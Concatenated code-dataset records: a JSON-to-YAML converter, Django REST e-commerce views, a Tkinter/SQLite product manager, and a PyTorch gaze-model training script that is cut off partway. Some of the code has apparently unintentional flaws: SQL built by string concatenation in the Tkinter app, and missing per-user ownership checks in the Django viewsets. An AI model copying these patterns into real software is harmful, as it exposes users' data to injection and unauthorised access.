run_from_data(deserializeddata, yamlfilelocation):\n        # dump an already-deserialized object straight to a YAML file\n        print(\"\\nlet's convert something...\")\n        with open(yamlfilelocation, 'w', encoding='utf8') as outgoingfile:\n            yaml.dump(deserializeddata, outgoingfile, allow_unicode=True)\n        print(\"conversion is done!\")\n\n    @staticmethod\n    def run(jsonfilelocation, yamlfilelocation):\n        print(\"\\nlet's convert something...\")\n        with open(jsonfilelocation, 'r', encoding='utf8') as incomingfile:\n            deserializeddata = json.load(incomingfile)\n        with open(yamlfilelocation, 'w', encoding='utf8') as outgoingfile:\n            yaml.dump(deserializeddata, outgoingfile, allow_unicode=True)\n        print(\"conversion is done!\")\n","repo_name":"makspervov/Integracja-systemow","sub_path":"lab2/Python (Zad 2.2-2.6, 2.8)/convert_json_to_yaml.py","file_name":"convert_json_to_yaml.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8408583324","text":"from django.contrib.auth import get_user_model\n\nfrom rest_framework import viewsets, status\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\n\nfrom .models import Produto, Pedido, ItemPedido, Endereco\nfrom .serializers import *\nfrom .utils import gerar_id\n\n\nUser = get_user_model()\n\n\nclass ProdutoViewset(viewsets.ReadOnlyModelViewSet):\n    queryset = Produto.objects.filter(listado=True)\n    serializer_class = ProdutoSerializer\n\n    def get_queryset(self):\n        # make sure the queryset is re-evaluated on every request (self.queryset is cached)\n        queryset = super().get_queryset()\n\n        if self.request.query_params:\n            # accept orderings as URL params (e.g. ?ordem=nome)\n            query_params = self.request.query_params\n            if 'ordem' in query_params:\n                campo_ordem = query_params.get('ordem')\n                return queryset.order_by(campo_ordem)\n\n            if 'slug' in query_params:\n                queryset = queryset.filter(slug=query_params.get('slug'))\n\n        return queryset\n\n    @action(detail=True, methods=['post'])\n    def adicionar_ao_carrinho(self, request, pk=None):\n        cliente_atual = request.user\n        produto_atual = self.get_object()\n\n        pedido_atual, criado = Pedido.objects.get_or_create(\n            cliente=cliente_atual,\n            status='carrinho',\n            #defaults={'id_pedido': gerar_id(12)},\n        )\n\n        produto_comprado = ItemPedido.objects.create(\n            produto=produto_atual,\n            pedido=pedido_atual,\n            quantidade=int(request.data.get('quantidade'))\n        )\n\n        pedido_atual.quantidade += produto_comprado.quantidade\n        # ten reais of shipping for each product in the order\n        # pedido_atual.frete = 10 * pedido_atual.quantidade\n        pedido_atual.subtotal += produto_atual.preco * produto_comprado.quantidade\n        pedido_atual.save()\n\n        pedido_serializer = PedidoSerializer(pedido_atual)\n\n        return Response(data=pedido_serializer.data, status=status.HTTP_201_CREATED)\n\n\nclass EnderecoViewset(viewsets.ModelViewSet):\n    permission_classes = [IsAuthenticated]\n    queryset = Endereco.objects.all()\n    serializer_class = EnderecoSerializer\n\n    def list(self, request):\n        cliente = request.user\n        queryset = Endereco.objects.filter(cliente=cliente)\n        serializer = EnderecoSerializer(queryset, many=True)\n\n        return Response(serializer.data, status=status.HTTP_200_OK)\n\n    def create(self, request):\n        cliente = request.user\n        dados_endereco = {'cliente': cliente.pk, **request.data}\n        serializer = self.get_serializer(data=dados_endereco)\n        serializer.is_valid(raise_exception=True)\n        self.perform_create(serializer)\n        headers = self.get_success_headers(serializer.data)\n        return 
Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n\nclass PedidoViewset(viewsets.ModelViewSet):\n    permission_classes = [IsAuthenticated]\n    queryset = Pedido.objects.all()\n\n    def list(self, request):\n        cliente = request.user\n        queryset = Pedido.objects.filter(cliente=cliente)\n        serializer = PedidoSerializer(queryset, many=True)\n\n        return Response(serializer.data, status=status.HTTP_200_OK)\n\n    @action(detail=True, methods=['get'])\n    def ver_itens(self, request, pk=None):\n        # endpoint to list every product of a specific order\n        pedido_atual = self.get_object()\n        itens_pedido = ItemPedido.objects.filter(pedido=pedido_atual)\n        serializer = ItemPedidoSerializer(itens_pedido, many=True)\n\n        return Response(serializer.data, status=status.HTTP_200_OK)\n\n    @action(detail=False, methods=['get'])\n    def carrinho(self, request):\n        # endpoint to inspect the items currently in the cart\n        cliente_atual = request.user\n        carrinho = ItemPedido.objects.filter(\n            pedido__cliente=cliente_atual, pedido__status='carrinho')\n        serializer = ItemPedidoSerializer(carrinho, many=True)\n\n        return Response(serializer.data, status=status.HTTP_200_OK)\n\n    @action(detail=False, methods=['post'])\n    def checkout(self, request):\n        '''\n        Check out an order:\n        validate the user's address, check balance and stock,\n        deduct the balance and deduct the products from stock.\n        '''\n        cliente_atual = request.user\n        id_endereco = int(request.data.get('endereco'))\n        carrinho = Pedido.objects.get(cliente=cliente_atual, status='carrinho')\n        itens_carrinho = ItemPedido.objects.filter(pedido=carrinho)\n\n        # balance and address checks for the client\n        endereco = Endereco.objects.get(id=id_endereco)\n\n        if (endereco.cliente != cliente_atual):\n            return Response({'erro': 'O endereço enviado não pertence a você.'}, status=status.HTTP_400_BAD_REQUEST)\n        elif (cliente_atual.saldo < carrinho.total):\n            return Response({'erro': 'Saldo insuficiente.'}, status=status.HTTP_400_BAD_REQUEST)\n\n        # stock check for the products\n        for item_comprado in itens_carrinho:\n            produto = item_comprado.produto\n            if produto.estoque < item_comprado.quantidade:\n                return Response({'erro': f'Produto {produto.nome} fora de estoque.'}, status=status.HTTP_400_BAD_REQUEST)\n\n        # deduct the purchased quantities from stock\n        for item_comprado in itens_carrinho:\n            produto = item_comprado.produto\n            produto.estoque -= item_comprado.quantidade\n\n            produto.save()\n\n        # deduct the client's balance\n        cliente_atual.saldo -= carrinho.total\n        cliente_atual.save()\n\n        # set the order status to payment approved\n        carrinho.status = 'aprovado'\n        carrinho.save()\n\n        return Response({'mensagem': 'Transação concluída.'}, status=status.HTTP_200_OK)\n\n\nclass ItemPedidoViewset(viewsets.ModelViewSet):\n    permission_classes = [IsAuthenticated]\n    queryset = ItemPedido.objects.all()\n\n    def destroy(self, request, pk=None):\n        # update the order totals when removing items from the cart\n        item_atual = self.get_object()\n        pedido = item_atual.pedido\n        produto = item_atual.produto\n\n        if pedido.status != 'carrinho':\n            return Response({'erro': 'Itens de pedidos fechados não podem ser apagados'}, status=status.HTTP_400_BAD_REQUEST)\n\n        # update the status of the current order\n        pedido.subtotal -= produto.preco * item_atual.quantidade\n        pedido.frete = 10 * pedido.quantidade\n        pedido.save()\n\n        super().destroy(request, 
pk)\n","repo_name":"and3rcg/ps-supera-backend","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4661526308","text":"# Import libraries\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import ttk\nimport sqlite3\n\n\n# Build the GUI\n\nroot = Tk()\nroot.title('Ferreteria El Tornillo Feliz')\nroot.geometry(\"620x350\")\n\nid = StringVar()\ncodproduct = StringVar()\ndescription= StringVar()\nprice = StringVar()\ntotal = StringVar()\n\ndef conection_bd():\n    conection=sqlite3.connect('base')\n    cursor=conection.cursor()\n    try:\n        cursor.execute('''\n        CREATE TABLE product(\n        ID INTEGER PRIMARY KEY AUTOINCREMENT,\n        CODPRODUCT VARCHAR(10) NOT NULL,\n        DESCRIPTION VARCHAR(100) NOT NULL,\n        PRICE FLOAT NOT NULL,\n        TOTAL FLOAT NOT NULL)\n        ''')\n\n        messagebox.showinfo(\"CONEXION\", \"Base de datos creada exitosamente\")\n    except:\n        messagebox.showinfo(\"CONEXION\", \"Conexión exitosa con la base de datos\")\n\ndef delete_bd():\n    conection=sqlite3.connect('base')\n    cursor=conection.cursor()\n    if messagebox.askyesno(message='Los datos se perderán, desea continuar', title= 'Advertencia'):\n        cursor.execute('DROP TABLE product')\n    else:\n        pass\n\n\ndef end_app():\n    valor= messagebox.askquestion('Salir', '¿está seguro que desea salir de la aplicación?')\n    if valor == \"yes\":\n        root.destroy()\n\ndef clean_fields():\n    codproduct.set(\"\")\n    description.set(\"\")\n    price.set(\"\")\n    total.set(\"\")\n\ndef message():\n    about= '''\n    Aplicación de Escritorio\n    Tecnology Python Tkinter\n    '''\n    messagebox.showinfo(title='Información', message=about)\n## CRUD methods\n\ndef create():\n    conection=sqlite3.connect('base')\n    cursor=conection.cursor()\n    try:\n        data= codproduct.get(), description.get(), price.get(), total.get()\n        cursor.execute('INSERT INTO product VALUES(NULL,?,?,?,?)', (data))\n        conection.commit()\n    except:\n        messagebox.showwarning('Advertencia', 'Ocurrió un error al crear el registro, verifique la conexión con la base de datos')\n        pass\n    clean_fields()\n    show()\n\ndef show():\n    conection=sqlite3.connect('base')\n    cursor=conection.cursor()\n    register = tree.get_children()\n    for element in register:\n        tree.delete(element)\n\n    try:\n        cursor.execute('SELECT * FROM product')\n        for row in cursor:\n            tree.insert('',0,text=row[0], values= (row[1], row[2], row[3], row[4]))\n    except:\n        pass\n\n## Table\n\ntree = ttk.Treeview(height=10, columns = ('#0', '#1', '#2', '#3'))\ntree.place (x=0, y=130)\ntree.column('#0', width=50)\ntree.heading('#0', text='Id', anchor= CENTER)\ntree.heading('#1', text='Código Producto', anchor= CENTER)\ntree.column('#1', width=100)\ntree.heading('#2', text='Descripción', anchor= CENTER)\ntree.column('#2', width=230)\ntree.heading('#3', text='Precio', anchor= CENTER)\ntree.column('#3', width=100)\ntree.heading('#4', text='Total', anchor= CENTER)\ntree.column('#4', width=150)\n\ndef select_on_click(event):\n    item= tree.identify('item', event.x, event.y)\n    id.set(tree.item(item,'text'))\n    codproduct.set(tree.item(item,'values')[0])\n    description.set(tree.item(item,'values')[1])\n    price.set(tree.item(item,'values')[2])\n    total.set(tree.item(item,'values')[3])\n\n# fill the entry fields when a row is clicked (left-button release)\ntree.bind('<ButtonRelease-1>', select_on_click)\n\n\ndef update():\n    conection=sqlite3.connect('base')\n    cursor=conection.cursor()\n    try:\n        data = codproduct.get(), description.get(), price.get(), total.get()\n        cursor.execute('UPDATE product SET CODPRODUCT=?, DESCRIPTION=?, PRICE=?, TOTAL=? WHERE ID='+ id.get(), (data))\n        conection.commit()\n    except:\n        messagebox.showwarning('Advertencia', 'Ocurrio un error al actualizar el registro')\n        pass\n    clean_fields()\n    show()\n\ndef delete():\n    conection=sqlite3.connect('base')\n    cursor=conection.cursor()\n    try:\n        if messagebox.askyesno(message='¿Quiere eliminar el registros?', title='Advertencia'):\n            cursor.execute('DELETE FROM product WHERE ID='+ id.get())\n            conection.commit()\n    except:\n        messagebox.showwarning('Advertencia','Ocurrio un error al tratar de eliminar el registro')\n        pass\n    clean_fields()\n    show()\n\n## Place the widgets in the VIEW\n\n# Menu\nmenubar= Menu(root)\nmenubasedat = Menu(menubar,tearoff=0)\nmenubasedat.add_command(label='Crear/Conectar Base de Datos', command=conection_bd)\nmenubasedat.add_command(label='Eliminar Base de Datos', command=delete_bd)\nmenubasedat.add_command(label='Salir', command=end_app)\nmenubar.add_cascade(label='Inicio', menu=menubasedat)\n\nhelp=Menu(menubar, tearoff=0)\nhelp.add_command(label='Limpiar campos', command=clean_fields)\nhelp.add_command(label= 'Acerca', command= message)\nmenubar.add_cascade(label='Ayuda', menu=help)\n\n# Labels and text boxes\n\ne1 = Entry(root, textvariable= id)\n\nl2 = Label(root, text= 'Código :')\nl2.place(x=50, y=10)\ne2 = Entry(root, textvariable=codproduct, width=20)\ne2.place(x=100, y=10)\n\nl3= Label(root, text= 'Descripción :')\nl3.place(x=50, y=40)\ne3 = Entry(root, textvariable=description, width=50)\ne3.place(x=125, y=40)\n\n\nl5 = Label(root, text= 'Precio :')\nl5.place(x=50, y=70)\ne5 = Entry(root, textvariable=price, width=10)\ne5.place(x=95, y=70)\n\n\nl2 = Label(root, text= 'Total :')\nl2.place(x=50, y=100)\ne2 = Entry(root, textvariable=total, width=10)\ne2.place(x=90, y=100)\n\n\n# Buttons\n\nb1=Button(root, text='Registrar', command=create)\nb1.place(x=360, y=90)\n\nb2=Button(root, text='Mostrar Lista', bg= 'grey', command=show)\nb2.place(x=500, y=90)\n\n\nb3=Button(root, text='Eliminar', bg= 'red', command=delete)\nb3.place(x=430, y=90)\n\n\n\nroot.config(menu=menubar)\n\nroot.mainloop()","repo_name":"SuperGandhi/Desktop-application-Tkinter","sub_path":"product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":5617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7165746984","text":"import numpy as np\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom tqdm import tqdm\nfrom gazesim.training.config import parse_config\nfrom gazesim.training.utils import get_batch_size, to_device, load_model\nfrom gazesim.training.helpers import resolve_model_class, resolve_dataset_class, resolve_optimiser_class\nfrom gazesim.training.helpers import resolve_losses, resolve_output_processing_func, resolve_logger_class\nfrom gazesim.data.utils import pair\n\n\ndef train(config, device):\n    # generators\n    training_set = resolve_dataset_class(config[\"dataset_name\"])(config, split=\"train\")\n    training_generator = DataLoader(training_set, batch_size=config[\"batch_size\"],\n                                    shuffle=True, num_workers=config[\"num_workers\"])\n\n    validation_set = resolve_dataset_class(config[\"dataset_name\"])(config, split=\"val\")\n    validation_generator = DataLoader(validation_set, batch_size=config[\"batch_size\"],\n                                      shuffle=False, num_workers=config[\"num_workers\"])\n\n    # define the model\n    model_class = resolve_model_class(config[\"model_name\"])\n    model = model_class(config)\n    if config[\"model_info\"] is not None:\n        # TODO: need to 
update this to work with models where we want to partially load them\n # => might be good to have a method for models like that which can be called\n model.load_state_dict(config[\"model_info\"][\"model_state_dict\"])\n model = model.to(device)\n\n # define the optimiser\n optimiser = resolve_optimiser_class(config[\"optimiser\"])(model.parameters(), lr=config[\"learning_rate\"])\n if config[\"model_info\"] is not None:\n optimiser.load_state_dict(config[\"model_info\"][\"optimiser_state_dict\"])\n\n # define the loss function(s)\n loss_functions = resolve_losses(config[\"losses\"])\n\n # define the logger\n logger = resolve_logger_class(config[\"dataset_name\"], config[\"mode\"])(config)\n logger.update_info(model=model, dataset=training_set)\n\n # prepare for doing pass over validation data args.validation_frequency times each epoch\n validation_check = np.linspace(0, len(training_set), config[\"validation_frequency\"] + 1)\n validation_check = np.round(validation_check).astype(int)\n validation_check = validation_check[1:]\n\n # loop over epochs\n global_step = 0 if config[\"model_info\"] is None else config[\"model_info\"][\"global_step\"]\n for epoch in range(0 if config[\"model_info\"] is None else config[\"model_info\"][\"epoch\"] + 1, config[\"num_epochs\"]):\n print(\"Starting epoch {:03d}!\".format(epoch))\n model.train()\n validation_current = 0\n\n for batch_index, batch in tqdm(enumerate(training_generator), total=len(training_generator)):\n # transfer to GPU\n batch = to_device(batch, device)\n\n # forward pass, loss computation and backward pass\n optimiser.zero_grad()\n predictions = model(batch)\n total_loss = None\n partial_losses = {}\n for output in predictions:\n if isinstance(predictions[output], dict):\n # this is very ugly, but for now it should work for the multi-scale attention model\n partial_losses[output] = {}\n for partial_output in predictions[output]:\n current_prediction = resolve_output_processing_func(\n output, config[\"losses\"][output])(predictions[output][partial_output])\n current_loss = loss_functions[output](current_prediction, batch[output])\n if total_loss is None:\n total_loss = current_loss\n else:\n total_loss += current_loss\n partial_losses[output][partial_output] = current_loss\n else:\n current_prediction = resolve_output_processing_func(\n output, config[\"losses\"][output])(predictions[output])\n current_loss = loss_functions[output](current_prediction, batch[output])\n if total_loss is None:\n total_loss = current_loss\n else:\n total_loss += current_loss\n partial_losses[output] = current_loss\n total_loss.backward()\n optimiser.step()\n\n with torch.no_grad():\n # global_step += batch[sorted(batch.keys())[0]].shape[0]\n global_step += get_batch_size(batch)\n\n # log at the end of each training step (each batch)\n # scalar_loss = loss.item()\n logger.training_step_end(global_step, total_loss, partial_losses, batch, predictions)\n\n # do validation if it should be done\n if (global_step - epoch * len(training_set)) >= validation_check[validation_current]:\n disable = True\n if config[\"validation_frequency\"] == 1:\n print(\"Validation for epoch {:03d}!\".format(epoch))\n disable = False\n\n model.eval()\n for val_batch_index, val_batch in tqdm(enumerate(validation_generator), disable=disable, total=len(validation_generator)):\n # transfer to GPU\n val_batch = to_device(val_batch, device)\n\n # forward pass and loss computation\n val_predictions = model(val_batch)\n total_val_loss = None\n partial_val_losses = {}\n for output in 
val_predictions:\n if isinstance(val_predictions[output], dict):\n # this is very ugly, but for now it should work for the multi-scale attention model\n partial_val_losses[output] = {}\n for partial_output in val_predictions[output]:\n current_prediction = resolve_output_processing_func(\n output, config[\"losses\"][output])(val_predictions[output][partial_output])\n current_loss = loss_functions[output](current_prediction, val_batch[output])\n if total_val_loss is None:\n total_val_loss = current_loss\n else:\n total_val_loss += current_loss\n partial_val_losses[output] = current_loss\n else:\n current_prediction = resolve_output_processing_func(\n output, config[\"losses\"][output])(val_predictions[output])\n current_loss = loss_functions[output](current_prediction, val_batch[output])\n if total_val_loss is None:\n total_val_loss = current_loss\n else:\n total_val_loss += current_loss\n partial_val_losses[output] = current_loss\n\n # tracking the loss in the logger\n # val_scalar_loss = val_loss.item()\n logger.validation_step_end(global_step, total_val_loss, partial_val_losses, val_batch, val_predictions)\n\n # log after the complete pass over the validation set\n logger.validation_epoch_end(global_step, epoch, model, optimiser)\n\n # update index for checking whether we should run validation loop\n validation_current += 1\n model.train()\n\n # log at the end of the epoch\n logger.training_epoch_end(global_step, epoch, model, optimiser)\n\n\ndef cross_validate(config, device):\n # TODO: what should the CV logger log?\n # - should the different CV runs be subdirectories or should they be stored as different scalars/variables?\n # => maybe these should just be entirely different, e.g. \"cv/loss/...\"\n # - do we even want to log e.g. training loss with cross validation?\n # => probably should, just to see if everything's progressing\n # - how should the final output of the cross-validation be saved?\n\n # define the classes here (could also be done in main...)\n dataset_class = resolve_dataset_class(config[\"dataset_name\"])\n model_class = resolve_model_class(config[\"model_name\"])\n optimiser_class = resolve_optimiser_class(config[\"optimiser\"])\n\n # define the loss function(s)\n loss_functions = resolve_losses(config[\"losses\"])\n\n # define the logger\n logger = resolve_logger_class(config[\"dataset_name\"], config[\"mode\"])(config)\n\n for cv_split in range(config[\"cv_splits\"]):\n print(\"Starting split {:02d}!\".format(cv_split))\n\n # generators\n training_set = dataset_class(config, split=\"train\", cv_split=cv_split)\n training_generator = DataLoader(training_set, batch_size=config[\"batch_size\"],\n shuffle=True, num_workers=config[\"num_workers\"])\n\n validation_set = dataset_class(config, split=\"test\", cv_split=cv_split)\n validation_generator = DataLoader(validation_set, batch_size=config[\"batch_size\"],\n shuffle=False, num_workers=config[\"num_workers\"])\n\n # define the model, no loading functionality here for now, would only make sense with something\n # like dreyeve and then it would probably take way to long to train for cross validation\n model = model_class(config)\n model = model.to(device)\n\n # update logger\n logger.update_info(model=model, dataset=training_set, split=cv_split)\n\n # define the optimiser, no loading same as for models\n optimiser = optimiser_class(model.parameters(), lr=config[\"learning_rate\"])\n\n # prepare for doing pass over validation data args.validation_frequency times each epoch\n validation_check = np.linspace(0, 
len(training_set), config[\"validation_frequency\"] + 1)\n        validation_check = np.round(validation_check).astype(int)\n        validation_check = validation_check[1:]\n\n        # loop over epochs\n        global_step = 0\n        disable = True  # tqdm verbosity flag; also read by the final training pass below\n        for epoch in range(config[\"num_epochs\"]):\n            print(\"Starting epoch {:03d}!\".format(epoch))\n            validation_current = 0\n\n            model.train()\n            for batch_index, batch in tqdm(enumerate(training_generator), total=len(training_generator)):\n                # transfer to GPU\n                batch = to_device(batch, device)\n\n                # forward pass, loss computation and backward pass\n                optimiser.zero_grad()\n                predictions = model(batch)\n                total_loss = None\n                partial_losses = {}\n                for output in predictions:\n                    current_prediction = resolve_output_processing_func(output)(predictions[output])\n                    current_loss = loss_functions[output](current_prediction, batch[output])\n                    if total_loss is None:\n                        total_loss = current_loss\n                    else:\n                        total_loss += current_loss\n                    partial_losses[output] = current_loss\n                total_loss.backward()\n                optimiser.step()\n\n                with torch.no_grad():\n                    global_step += get_batch_size(batch)\n\n                    # log at the end of each training step (each batch)\n                    logger.training_step_end(global_step, total_loss, partial_losses, batch, predictions)\n\n                    # do validation if it should be done\n                    if (global_step - epoch * len(training_set)) >= validation_check[validation_current]:\n                        disable = True\n                        if config[\"validation_frequency\"] == 1:\n                            print(\"Validation for epoch {:03d}!\".format(epoch))\n                            disable = False\n\n                        model.eval()\n                        for val_batch_index, val_batch in tqdm(enumerate(validation_generator), disable=disable,\n                                                               total=len(validation_generator)):\n                            # transfer to GPU\n                            val_batch = to_device(val_batch, device)\n\n                            # forward pass and loss computation\n                            val_predictions = model(val_batch)\n                            total_val_loss = None\n                            partial_val_losses = {}\n                            for output in val_predictions:\n                                current_prediction = resolve_output_processing_func(output)(val_predictions[output])\n                                current_loss = loss_functions[output](current_prediction, val_batch[output])\n                                if total_val_loss is None:\n                                    total_val_loss = current_loss\n                                else:\n                                    total_val_loss += current_loss\n                                partial_val_losses[output] = current_loss\n\n                            # tracking the loss in the logger\n                            # TODO: should probably also just record the validation error(s) for the\n                            #  different splits in the logger and then save them in the logger as well\n                            logger.validation_step_end(global_step, total_val_loss, partial_val_losses, val_batch,\n                                                       val_predictions)\n\n                        # log after the complete pass over the validation set\n                        logger.validation_epoch_end(global_step, epoch, model, optimiser)\n\n                        # update index for checking whether we should run validation loop\n                        validation_current += 1\n                        model.train()\n\n            # log at the end of the epoch\n            logger.training_epoch_end(global_step, epoch, model, optimiser)\n\n        with torch.no_grad():\n            model.eval()\n            for train_batch_index, train_batch in tqdm(enumerate(training_generator), disable=disable,\n                                                       total=len(training_generator)):\n                # transfer to GPU\n                train_batch = to_device(train_batch, device)\n\n                # forward pass and loss computation\n                train_predictions = model(train_batch)\n                total_train_loss = None\n                partial_train_losses = {}\n                for output in train_predictions:\n                    current_prediction = resolve_output_processing_func(output)(train_predictions[output])\n                    current_loss = loss_functions[output](current_prediction, train_batch[output])\n                    if total_train_loss is None:\n                        total_train_loss = current_loss\n                    else:\n                        total_train_loss += current_loss\n                    partial_train_losses[output] = current_loss\n\n                # tracking the loss in the logger\n                
logger.final_training_pass_step_end(global_step, total_train_loss, partial_train_losses,\n train_batch, train_predictions)\n\n # log after the complete pass over the training set\n logger.final_training_pass_epoch_end(global_step, epoch, model, optimiser)\n model.train()\n\n\ndef val_or_test(config, device):\n # load the model\n model, model_config = load_model(config[\"model_load_path\"], config[\"gpu\"], return_config=True)\n model.to(device)\n model.eval()\n\n # modify model config for dataset loading\n model_config[\"data_root\"] = config[\"data_root\"]\n model_config[\"split_config\"] = config[\"split_config\"]\n model_config[\"eval_model_load_path\"] = config[\"model_load_path\"]\n\n # define the dataset\n validation_set = resolve_dataset_class(model_config[\"dataset_name\"])(model_config, split=config[\"mode\"])\n validation_generator = DataLoader(validation_set, batch_size=config[\"batch_size\"],\n shuffle=False, num_workers=config[\"num_workers\"])\n\n # define the loss function(s)\n loss_functions = resolve_losses(model_config[\"losses\"])\n\n # define the logger and disable writing to hardware\n logger = resolve_logger_class(model_config[\"dataset_name\"], config[\"mode\"])(model_config, disable_write_to_disk=True)\n logger.update_info(model=model, dataset=validation_set)\n\n print(\"Starting validation!\")\n with torch.no_grad():\n model.eval()\n for val_batch_index, val_batch in tqdm(enumerate(validation_generator), total=len(validation_generator)):\n # transfer to GPU\n val_batch = to_device(val_batch, device)\n\n # forward pass and loss computation\n val_predictions = model(val_batch)\n total_val_loss = None\n partial_val_losses = {}\n for output in val_predictions:\n if isinstance(val_predictions[output], dict):\n # this is very ugly, but for now it should work for the multi-scale attention model\n partial_val_losses[output] = {}\n for partial_output in val_predictions[output]:\n current_prediction = resolve_output_processing_func(\n output, model_config[\"losses\"][output])(val_predictions[output][partial_output])\n current_loss = loss_functions[output](current_prediction, val_batch[output])\n if total_val_loss is None:\n total_val_loss = current_loss\n else:\n total_val_loss += current_loss\n partial_val_losses[output] = current_loss\n else:\n current_prediction = resolve_output_processing_func(\n output, model_config[\"losses\"][output])(val_predictions[output])\n current_loss = loss_functions[output](current_prediction, val_batch[output])\n if total_val_loss is None:\n total_val_loss = current_loss\n else:\n total_val_loss += current_loss\n partial_val_losses[output] = current_loss\n\n # tracking the loss in the logger\n logger.validation_step_end(0, total_val_loss, partial_val_losses, val_batch, val_predictions)\n\n # print out results after complete pass over validation set\n test = logger.total_loss_val / len(validation_generator)\n logger.validation_epoch_end(0, 0, model, None)\n\n print(\"Finished validation!\")\n print(\"Validation loss :\", test.item())\n\n\ndef main(config):\n # set the seed for PyTorch\n torch.manual_seed(config[\"torch_seed\"])\n np.random.seed(config[\"torch_seed\"])\n\n # use GPU if possible\n use_cuda = torch.cuda.is_available()\n device = torch.device(\"cuda:{}\".format(config[\"gpu\"])\n if use_cuda and config[\"gpu\"] < torch.cuda.device_count() else \"cpu\")\n\n # check what to do: at the moment only choice between training and cross validation\n # would be easier to just specify that training/CV should be done rather than checking 
automatically...\n    {\"train\": train, \"cv\": cross_validate, \"val\": val_or_test, \"test\": val_or_test}[config[\"mode\"]](config, device)\n\n\nif __name__ == \"__main__\":\n    import argparse\n\n    parser = argparse.ArgumentParser()\n\n    # arguments related to the dataset\n    parser.add_argument(\"-r\", \"--data_root\", type=str,\n                        help=\"The root directory of the dataset (should contain only subfolders for each subject).\")\n    parser.add_argument(\"-sc\", \"--split_config\",\n                        help=\"The split configuration/index to get information about the division into training \"\n                             \"and validation (and test) data from. Can either be the path to a file or an index \"\n                             \"(will search in $DATA_ROOT/splits/).\")\n    parser.add_argument(\"-fps\", \"--frames_per_second\", type=int,\n                        help=\"Frame rate of the input videos (needs to be specified \"\n                             \"since the original indexing is done at 60 FPS).\")\n    parser.add_argument(\"-ss\", \"--stack_size\", type=int,\n                        help=\"Number of frames to stack for models that take multiple \"\n                             \"frames as input (i.e. C3D, Dr(eye)ve, RNNs)\")\n    parser.add_argument(\"-ivn\", \"--input_video_names\", type=str, nargs=\"+\",\n                        help=\"The (file) name(s) for the video(s) to use as input.\")\n    parser.add_argument(\"-dsn\", \"--drone_state_names\", type=str, nargs=\"+\",\n                        help=\"The column names/quantities to use as input when there is a drone state input. \"\n                             \"Can also specify the following shorthands for pre-defined sets of columns: \"\n                             \"'all', 'vel', 'acc', 'ang_vel'.\")\n    parser.add_argument(\"-agt\", \"--attention_ground_truth\", type=str,\n                        help=\"The (file) name(s) for the video(s) to use as targets for attention.\")\n    parser.add_argument(\"-cgt\", \"--control_ground_truth\", type=str,\n                        help=\"The (file) name(s) for the video(s) to use as targets for control.\")\n    # parser.add_argument(\"-gtn\", \"--ground_truth_name\", type=str,  # TODO: remove\n    #                     help=\"The (file) name(s) for the video(s) to use as targets for attention.\")\n    parser.add_argument(\"-c\", \"--config_file\", type=str,\n                        help=\"Config file to load parameters from.\")\n\n    # arguments related to data normalisation/standardisation\n    parser.add_argument(\"-nn\", \"--no_normalisation\", action=\"store_true\",\n                        help=\"Whether or not to normalise the image input data.\")\n    parser.add_argument(\"-cn\", \"--control_normalisation\", action=\"store_true\",\n                        help=\"Whether or not to normalise the control input data.\")\n    parser.add_argument(\"-cnr\", \"--control_normalisation_range\", type=pair, nargs=\"+\",\n                        help=\"Ranges of control inputs to use for normalisation (i.e. 
maximum thrust and body rates).\")\n parser.add_argument(\"-cg\", \"--clip_gaze\", action=\"store_true\",\n help=\"Whether or not to clip gaze GT to [-1, 1] when loading it.\")\n parser.add_argument(\"-sg\", \"--scale_gaze\", action=\"store_true\",\n help=\"Whether or not to scale gaze GT to actual image coordinates (after clipping).\")\n\n # arguments related to (video) data augmentation\n parser.add_argument(\"-vda\", \"--video_data_augmentation\", action=\"store_true\",\n help=\"Whether or not to apply data augmentation for the image/video input data.\")\n parser.add_argument(\"--vda_probability\", type=float,\n help=\"Probability of applying individual data augmentation transforms.\")\n parser.add_argument(\"--vda_jitter_range\", type=float,\n help=\"Color jitter range for data augmentation.\")\n parser.add_argument(\"--vda_gaussian_noise_sigma\", type=float,\n help=\"Standard deviation for Gaussian noise applied for data augmentation.\")\n parser.add_argument(\"-vrc\", \"--video_random_cropping\", action=\"store_true\",\n help=\"Whether or not to randomly crop image/video input data.\")\n parser.add_argument(\"--vrc_factor_before_crop\", type=float,\n help=\"If random cropping is used, by what factor to \"\n \"resize images/attention maps to before cropping.\")\n\n # arguments related to the DDA input modalities\n parser.add_argument(\"-fts\", \"--feature_track_name\", type=str,\n help=\"The (file) name for already extracted feature tracks for the DDA architecture.\")\n parser.add_argument(\"-ftn\", \"--feature_track_num\", type=int,\n help=\"The number of feature tracks per sample to use in the DDA architecture.\")\n parser.add_argument(\"-rn\", \"--reference_name\", type=str,\n help=\"The (file) name for reference states for the DDA architecture.\")\n parser.add_argument(\"-rv\", \"--reference_variables\", type=str, nargs=\"+\",\n help=\"The column names/state variables to use for the reference statess for the DDA \"\n \"architecture. Can also specify the following shorthands for pre-defined sets of \"\n \"variables: 'all', 'pos', 'vel', 'acc', 'rot' 'omega'.\")\n parser.add_argument(\"-sen\", \"--state_estimate_name\", type=str,\n help=\"The (file) name for state estimate measurements for the DDA architecture.\")\n parser.add_argument(\"-sev\", \"--state_estimate_variables\", type=str, nargs=\"+\",\n help=\"The column names/state variables to use for the state estimates for the DDA \"\n \"architecture. 
